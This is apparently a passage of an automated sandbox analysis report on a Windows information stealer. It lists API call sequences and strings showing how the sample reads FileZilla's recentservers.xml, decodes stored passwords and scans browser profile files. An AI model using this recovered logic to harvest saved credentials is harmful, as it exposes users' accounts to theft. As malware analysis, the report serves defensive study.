                              • Instruction ID: f11111d731efd41d95532e3d38dfc363de74f26945c674d64c5ca720246947cc
                              • Opcode Fuzzy Hash: 1479f6931c5ce7400466bf38f8c289cb52de2d3e676cb13c028d1a165755fc27
                              • Instruction Fuzzy Hash: 0F627F3191261BABCF21AFA4CC4DAAE7FB9BF85700F048128F90597251DB78DD41CBA4
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A6E15
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 005A6E48
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A6E82
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A6EA9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A6EB4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A6EDD
                              • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 005A6EF7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A6F19
                              • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 005A6F25
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A6F50
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A6F80
                              • LocalAlloc.KERNEL32(00000040,?), ref: 005A6FB5
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A701D
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A704D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 313953988-555421843
                              • Opcode ID: c50d0339fab5d6cbf58f23efa3a8c36097138507314508c092da9c7b703001cb
                              • Instruction ID: 7c9331fc7a6865928f9bcb18df2ac70bbc551151f4a2c098a723f15c53799e8d
                              • Opcode Fuzzy Hash: c50d0339fab5d6cbf58f23efa3a8c36097138507314508c092da9c7b703001cb
                              • Instruction Fuzzy Hash: 9A427F71A1521AAFCB10ABB4CC4DFAF7FB9BF49700F184428F905A7251EB74D9418BA4
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059602F
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00596082
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005960B5
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005960E5
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00596120
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00596153
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00596163
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$InternetOpen
                              • String ID: "$------
                              • API String ID: 2041821634-2370822465
                              • Opcode ID: 72adb650980f8a036a645d2cc8609e434a2302d19248d1b40fa7cf64d995ef52
                              • Instruction ID: 2d56fffd6e9ee5a059aa613a0d916b9974e25bf29a53562da0e825a6f0489d80
                              • Opcode Fuzzy Hash: 72adb650980f8a036a645d2cc8609e434a2302d19248d1b40fa7cf64d995ef52
                              • Instruction Fuzzy Hash: 52524F3191161AABDF10AFB4DC8DAAE7BB5FF84700F158428F905A7251DB34EC46CBA4

                               Control-flow Graph (function at 005A6FF9; the rendered graph with its Executed / Not Executed colouring is not reproduced here)
                               • Recoverable structure: four lstrcpy calls, GetProcessHeap / RtlAllocateHeap, then a loop that locates <Host>, <Port>, <User> and <Pass encoding="base64"> with StrStrA, copies each value with lstrlen / lstrcpy, base64-decodes the password with CryptStringToBinaryA (size query, LocalAlloc, decode, LocalFree), assembles the record with fourteen lstrcat calls, and returns to the next <Host> hit
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A701D
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A704D
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A707D
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A70AF
                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 005A70BC
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005A70C3
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 005A70DA
                              • lstrlen.KERNEL32(00000000), ref: 005A70E5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A7128
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A714F
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 005A7162
                              • lstrlen.KERNEL32(00000000), ref: 005A716D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A71B0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A71D7
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 005A71EA
                              • lstrlen.KERNEL32(00000000), ref: 005A71F5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A7238
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A725F
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 005A7272
                              • lstrlen.KERNEL32(00000000), ref: 005A7281
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A72C9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A72F1
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 005A7314
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 005A7328
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 005A7349
                              • LocalFree.KERNEL32(00000000), ref: 005A7354
                              • lstrlen.KERNEL32(?), ref: 005A73EE
                              • lstrlen.KERNEL32(?), ref: 005A7401
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 2641759534-2314656281
                              • Opcode ID: dbe39f5018063118462d3c4d30a2c76ad0ef730603c9bfb319a582da4dbcc2f7
                              • Instruction ID: b58c3e4e8c4d017f6a9023ad5a60c9ca31b26d200d993efea4caea25169a5419
                              • Opcode Fuzzy Hash: dbe39f5018063118462d3c4d30a2c76ad0ef730603c9bfb319a582da4dbcc2f7
                              • Instruction Fuzzy Hash: 21026E71A1521AAFCB10ABB4CC4DFAE7FB9BF49B00F144418F905E7251EB78D9418BA4
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 0059DDC3
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059DE0E
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 0059DE4F
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 0059DE7F
                              • FindFirstFileA.KERNEL32(?,?), ref: 0059DE90
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindFirst
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 157892242-726946144
                              • Opcode ID: 745fe1af543fd114e558be54fdffc85859fa26e43f544d0a271baec59330be5f
                              • Instruction ID: ee18a434f5891d7c8d23c29ccb6db1719e8455244fb2357921c69e139d4f6c1b
                              • Opcode Fuzzy Hash: 745fe1af543fd114e558be54fdffc85859fa26e43f544d0a271baec59330be5f
                              • Instruction Fuzzy Hash: 96B26D71A0121A9FCF64DF65C84AB9A7FF5BF44710F18856DE809AB261EB34EC41CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A4F02
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4F2B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A4F39
                              • lstrlen.KERNEL32(005C5270), ref: 005A4F44
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4F61
                              • lstrcat.KERNEL32(00000000,005C5270), ref: 005A4F6D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4F9B
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 005A4FB5
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: prefs.js
                              • API String ID: 2567437900-3783873740
                              • Opcode ID: c69005f20ee681bf98382b1be740f33ee493e2c09dcab23b9bc1b785c795d2d8
                              • Instruction ID: f714f55b653df6f96eec6871d6ba6abd89a17f52a8c5606b965b3467e4b9f62c
                              • Opcode Fuzzy Hash: c69005f20ee681bf98382b1be740f33ee493e2c09dcab23b9bc1b785c795d2d8
                              • Instruction Fuzzy Hash: DC923C30A017069FDB24CF29C948F6ABBE5BF85714F19C06DE8499B2A1E735DC42CB51
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A1602
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1625
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A1630
                              • lstrlen.KERNEL32(005C5270), ref: 005A163B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1658
                              • lstrcat.KERNEL32(00000000,005C5270), ref: 005A1664
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1692
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 005A16AC
                              • StrCmpCA.SHLWAPI(?,005C1D68), ref: 005A16CB
                              • StrCmpCA.SHLWAPI(?,005C1D6C), ref: 005A16E3
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A1720
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1749
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A1754
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A175F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A177C
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A1788
                              • lstrlen.KERNEL32(?), ref: 005A1793
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A17B5
                              • lstrcat.KERNEL32(00000000,?), ref: 005A17C1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A17EE
                              • StrCmpCA.SHLWAPI(?,0160DB58), ref: 005A1815
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1856
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A187F
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A18B3
                              • StrCmpCA.SHLWAPI(?,0160DF20), ref: 005A18CE
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A190F
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1938
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A196C
                              • StrCmpCA.SHLWAPI(?,0160DBB8), ref: 005A1988
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A19B9
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A19E2
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1A0B
                              • StrCmpCA.SHLWAPI(?,0160DA68), ref: 005A1A37
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1A78
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1AA1
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1AD5
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1B24
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1B58
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1B93
                              • FindNextFileA.KERNEL32(00000000,?), ref: 005A1BBB
                              • FindClose.KERNEL32(00000000), ref: 005A1BCA
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                              • String ID:
                              • API String ID: 1346933759-0
                              • Opcode ID: bd60861249a962b109740196de3983744539a754b2014fafca03d63b1f50d22a
                              • Instruction ID: 5a6c980f7186819bb10260511ff71318587a6932418fdd7cb1ac20cfed972646
                              • Opcode Fuzzy Hash: bd60861249a962b109740196de3983744539a754b2014fafca03d63b1f50d22a
                              • Instruction Fuzzy Hash: 7E125C706117069BDB24AF79D88DA6F7FE8BF85340F04892CF88587250EB34D8458B99
                              APIs
                              • wsprintfA.USER32 ref: 005ACCFC
                              • FindFirstFileA.KERNEL32(?,?), ref: 005ACD13
                              • lstrcat.KERNEL32(?,?), ref: 005ACD5F
                              • StrCmpCA.SHLWAPI(?,005C1D68), ref: 005ACD71
                              • StrCmpCA.SHLWAPI(?,005C1D6C), ref: 005ACD8B
                              • wsprintfA.USER32 ref: 005ACDB0
                              • PathMatchSpecA.SHLWAPI(?,01609698), ref: 005ACDE2
                              • CoInitialize.OLE32(00000000), ref: 005ACDEE
                                • Part of subcall function 005ACBE0: CoCreateInstance.COMBASE(005BB140,00000000,00000001,005BB130,?), ref: 005ACC06
                                • Part of subcall function 005ACBE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 005ACC46
                                • Part of subcall function 005ACBE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 005ACCC9
                              • CoUninitialize.COMBASE ref: 005ACE09
                              • lstrcat.KERNEL32(?,?), ref: 005ACE2E
                              • lstrlen.KERNEL32(?), ref: 005ACE3B
                              • StrCmpCA.SHLWAPI(?,005BD014), ref: 005ACE55
                              • wsprintfA.USER32 ref: 005ACE7D
                              • wsprintfA.USER32 ref: 005ACE9C
                              • PathMatchSpecA.SHLWAPI(?,?), ref: 005ACEB0
                              • wsprintfA.USER32 ref: 005ACED8
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 005ACEF1
                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 005ACF10
                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 005ACF28
                              • CloseHandle.KERNEL32(00000000), ref: 005ACF33
                              • CloseHandle.KERNEL32(00000000), ref: 005ACF3F
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005ACF54
                              • lstrcpy.KERNEL32(00000000,?), ref: 005ACF94
                              • FindNextFileA.KERNEL32(?,?), ref: 005AD08D
                              • FindClose.KERNEL32(?), ref: 005AD09F
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                              • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 3860919712-2388001722
                              • Opcode ID: 50790a68bb7f89518099d285142ea6c250e52b417aa2ff21c50d9c0773fa5608
                              • Instruction ID: 09404a23e9182b120de51105bd14b615613f23796f62abfe627ee6a4720eca34
                              • Opcode Fuzzy Hash: 50790a68bb7f89518099d285142ea6c250e52b417aa2ff21c50d9c0773fa5608
                              • Instruction Fuzzy Hash: BBC16371900219AFCF54EF64DC49EEE7B79FF89700F048598F50997290EA34AA85CB61
                              APIs
                              • wsprintfA.USER32 ref: 005AE353
                              • FindFirstFileA.KERNEL32(?,?), ref: 005AE369
                              • StrCmpCA.SHLWAPI(?,005C1D68), ref: 005AE388
                              • StrCmpCA.SHLWAPI(?,005C1D6C), ref: 005AE3A0
                              • wsprintfA.USER32 ref: 005AE3C7
                              • StrCmpCA.SHLWAPI(?,005BD014), ref: 005AE3DC
                              • wsprintfA.USER32 ref: 005AE3F8
                                • Part of subcall function 005AEF30: lstrcpy.KERNEL32(00000000,?), ref: 005AEF62
                              • wsprintfA.USER32 ref: 005AE416
                              • PathMatchSpecA.SHLWAPI(?,?), ref: 005AE42B
                              • lstrcat.KERNEL32(?,0160EEF0), ref: 005AE460
                              • lstrcat.KERNEL32(?,005C1D5C), ref: 005AE473
                              • lstrcat.KERNEL32(?,?), ref: 005AE488
                              • lstrcat.KERNEL32(?,005C1D5C), ref: 005AE49B
                              • lstrcat.KERNEL32(?,?), ref: 005AE4B1
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 005AE4C6
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AE4FF
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AE553
                              • DeleteFileA.KERNEL32(?), ref: 005AE594
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591437
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591459
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 0059147B
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 005914DF
                              • FindNextFileA.KERNEL32(00000000,?), ref: 005AE5D9
                              • FindClose.KERNEL32(00000000), ref: 005AE5E8
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                              • String ID: %s\%s$%s\*
                              • API String ID: 1375681507-2848263008
                              • Opcode ID: deb2dc380dc8a3d23b4586fe47d0bccdc5fa5e76fa38abf6958b55a268bc6329
                              • Instruction ID: 79888cc6c8447ee4e66d5132228755f9a0f85c85ef41ae533e9fe04f5d9a9982
                              • Opcode Fuzzy Hash: deb2dc380dc8a3d23b4586fe47d0bccdc5fa5e76fa38abf6958b55a268bc6329
                              • Instruction Fuzzy Hash: D4816F715143459BCB60EFB4DC89EDF7BA9BFC8700F00891DB58987151EA34E9488BA6
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005915E2
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00591619
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059166C
                              • lstrcat.KERNEL32(00000000), ref: 00591676
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005916A2
                              • lstrcpy.KERNEL32(00000000,?), ref: 005917F3
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005917FE
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat
                              • String ID: \*.*
                              • API String ID: 2276651480-1173974218
                              • Opcode ID: f6189f634bbd57de190fa2eef98967c24024fec34f90d29db2af29616eb128fc
                              • Instruction ID: 3ee9b536e29f425f90944cd737c55fa1e1eb9c6b039f62225d62468288d7c39c
                              • Opcode Fuzzy Hash: f6189f634bbd57de190fa2eef98967c24024fec34f90d29db2af29616eb128fc
                              • Instruction Fuzzy Hash: 6B813F7191262BABCF11EF64C98DAAE7FB4FF44700F184128F905A7251DB349D41CBA5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 005ADE68
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005ADE6F
                              • wsprintfA.USER32 ref: 005ADE87
                              • FindFirstFileA.KERNEL32(?,?), ref: 005ADEA0
                              • StrCmpCA.SHLWAPI(?,005C1D68), ref: 005ADEBE
                              • StrCmpCA.SHLWAPI(?,005C1D6C), ref: 005ADED9
                              • wsprintfA.USER32 ref: 005ADEF9
                              • DeleteFileA.KERNEL32(?), ref: 005ADF4D
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 005ADF14
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591437
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591459
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 0059147B
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 005914DF
                                • Part of subcall function 005ADAA0: memset.MSVCRT ref: 005ADAC1
                                • Part of subcall function 005ADAA0: memset.MSVCRT ref: 005ADAD3
                                • Part of subcall function 005ADAA0: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 005ADAFB
                                • Part of subcall function 005ADAA0: lstrcpy.KERNEL32(00000000,?), ref: 005ADB2E
                                • Part of subcall function 005ADAA0: lstrcat.KERNEL32(?,00000000), ref: 005ADB3C
                                • Part of subcall function 005ADAA0: lstrcat.KERNEL32(?,0160E838), ref: 005ADB56
                                • Part of subcall function 005ADAA0: lstrcat.KERNEL32(?,?), ref: 005ADB6A
                                • Part of subcall function 005ADAA0: lstrcat.KERNEL32(?,0160DB88), ref: 005ADB7E
                                • Part of subcall function 005ADAA0: lstrcpy.KERNEL32(00000000,?), ref: 005ADBAE
                                • Part of subcall function 005ADAA0: GetFileAttributesA.KERNEL32(00000000), ref: 005ADBB5
                              • FindNextFileA.KERNEL32(00000000,?), ref: 005ADF5C
                              • FindClose.KERNEL32(00000000), ref: 005ADF6B
                              • lstrcat.KERNEL32(?,0160EEF0), ref: 005ADF92
                              • lstrcat.KERNEL32(?,0160DCE0), ref: 005ADFA4
                              • lstrlen.KERNEL32(?), ref: 005ADFAF
                              • lstrlen.KERNEL32(?), ref: 005ADFBE
                              • lstrcpy.KERNEL32(00000000,?), ref: 005ADFF4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                              • String ID: %s\%s$%s\*
                              • API String ID: 4184593125-2848263008
                              • Opcode ID: 565dd35a2e3d616751d3841b3a1c3f0e3789089a8031f085332a4b8e37b0b06a
                              • Instruction ID: 87e3d020137f1c547b0ebd7738e728ec5675a5fd56c4bb801ed01afa903bb6c5
                              • Opcode Fuzzy Hash: 565dd35a2e3d616751d3841b3a1c3f0e3789089a8031f085332a4b8e37b0b06a
                              • Instruction Fuzzy Hash: AA515D71514345AFC760EF74D849E9F7BE9BBC8301F00892DF99A87250EB34E9448B96
                              APIs
                              • wsprintfA.USER32 ref: 005AD65D
                              • FindFirstFileA.KERNEL32(?,?), ref: 005AD674
                              • StrCmpCA.SHLWAPI(?,005C1D68), ref: 005AD694
                              • StrCmpCA.SHLWAPI(?,005C1D6C), ref: 005AD6AE
                              • lstrcat.KERNEL32(?,0160EEF0), ref: 005AD6F3
                              • lstrcat.KERNEL32(?,0160EE70), ref: 005AD707
                              • lstrcat.KERNEL32(?,?), ref: 005AD71B
                              • lstrcat.KERNEL32(?,?), ref: 005AD72C
                              • lstrcat.KERNEL32(?,005C1D5C), ref: 005AD73E
                              • lstrcat.KERNEL32(?,?), ref: 005AD752
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AD792
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AD7E2
                              • FindNextFileA.KERNEL32(00000000,?), ref: 005AD847
                              • FindClose.KERNEL32(00000000), ref: 005AD856
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 50252434-4073750446
                              • Opcode ID: 3940730a759f65ace5f5a826e4e48cfc22e3ea5f1398c2dff908b2f6a064fe6e
                              • Instruction ID: 585c7031b0cb9b656ce8cceab37f62f9eb716462d0dc0dc11cc2d14c3aa50ca5
                              • Opcode Fuzzy Hash: 3940730a759f65ace5f5a826e4e48cfc22e3ea5f1398c2dff908b2f6a064fe6e
                              • Instruction Fuzzy Hash: F361657591021AAFCF54EF74CC89ADE7BB8FF48300F0084A9E64993251DB34AA85CF90
                              APIs
                              • CreateDesktopA.USER32(?), ref: 00599888
                              • lstrcat.KERNEL32(?,?), ref: 005998BB
                              • lstrcat.KERNEL32(?,?), ref: 005998CD
                              • lstrcat.KERNEL32(?,005C5128), ref: 005998DD
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0059991A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00599950
                              • StrStrA.SHLWAPI(?,0160E5F8), ref: 00599965
                              • lstrcpyn.KERNEL32(007C93D0,?,00000000), ref: 00599982
                              • lstrlen.KERNEL32(?), ref: 00599996
                              • wsprintfA.USER32 ref: 005999A6
                              • lstrcpy.KERNEL32(?,?), ref: 005999BD
                              • Sleep.KERNEL32(00001388), ref: 00599A41
                              • CloseDesktop.USER32(?), ref: 00599A81
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
